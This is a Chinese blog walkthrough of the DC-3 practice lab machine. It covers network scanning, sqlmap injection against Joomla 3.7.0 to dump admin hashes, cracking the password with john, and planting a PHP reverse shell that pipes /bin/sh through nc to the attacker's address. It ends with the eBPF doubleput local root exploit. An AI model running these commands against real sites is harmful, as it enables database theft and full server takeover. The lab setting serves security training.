码迷,mamicode.com
首页 > 其他好文 > 详细

DC-3靶机

时间:2020-05-07 20:05:16      阅读:83      评论:0      收藏:0      [点我收藏+]

标签:idt   share   ast   $1   get   pytho   raw   dex   put   

仅供个人娱乐

靶机信息

下载地址:http://www.five86.com/downloads/DC-3.zip

一、主机扫描

arp-scan -l

nmap -A -p 1-65535 -sV 192.168.17.133

技术图片

二、信息收集

技术图片
技术图片

使用joomscan对Dc3靶机网站进行扫描

apt-getinstall joomscan

joomscan--url http://192.168.17.133

技术图片

git clone https://github.com/Tuhinshubhra/CMSeeK

复制到/root

root@kali:~/CMSeeK# python3 cmseek.py --url http://192.168.17.133

技术图片

searchsploit joomla 3.7.0

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root

技术图片
技术图片

数据库
sqlmap -u "http://192.168.17.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

技术图片

当前数据库

sqlmap -u "http://192.168.17.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --current-db -p list[fullordering]

技术图片

sqlmap -u "http://192.168.17.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" --tables -p list[fullordering]

技术图片


sqlmap -u "http://192.168.17.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" --columns -p list[fullordering]

技术图片

查询#__users表的name、password字段,输出信息

sqlmap -u "http://192.168.17.133/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C "name,password" --dump -p list[fullordering]

技术图片

vim 1

admin:$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zukali

john 1

技术图片

破解得到admin密码为snoopy。

技术图片

登录后台 信息收集

技术图片

信息收集

技术图片
技术图片
技术图片
技术图片

在Joomla后台的模板管理中,选择一个模板并编辑,在modules.php插入小马

技术图片

编写反弹shell的PHP代码,,监听4444端口,并执行脚本文件,将反弹靶机shell到kali

技术图片

失败了 换页面编辑

nc -lvp 1337 #kali开启1337监听端口

<?php system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.17.129 1337 >/tmp/f‘);?> 

技术图片
技术图片

成功获取shell,使用searchsploit工具查找Ubuntu 16.04的提权漏洞,发现一个“拒绝服务漏洞”,可以用来提权。

技术图片

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root

cd /root

cat 39772.txt

技术图片

直接下载失败

技术图片
技术图片

https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

技术图片

unzip 39772.zip

cd 39772

tar -xvf exploit.tar

ls

cd ebpf_mapfd_doubleput_exploit

ls

技术图片

蚁剑上传

技术图片

./compile.sh

./doubleput

技术图片
技术图片

DC-3靶机

标签:idt   share   ast   $1   get   pytho   raw   dex   put   

原文地址:https://www.cnblogs.com/bingtang123/p/12838407.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!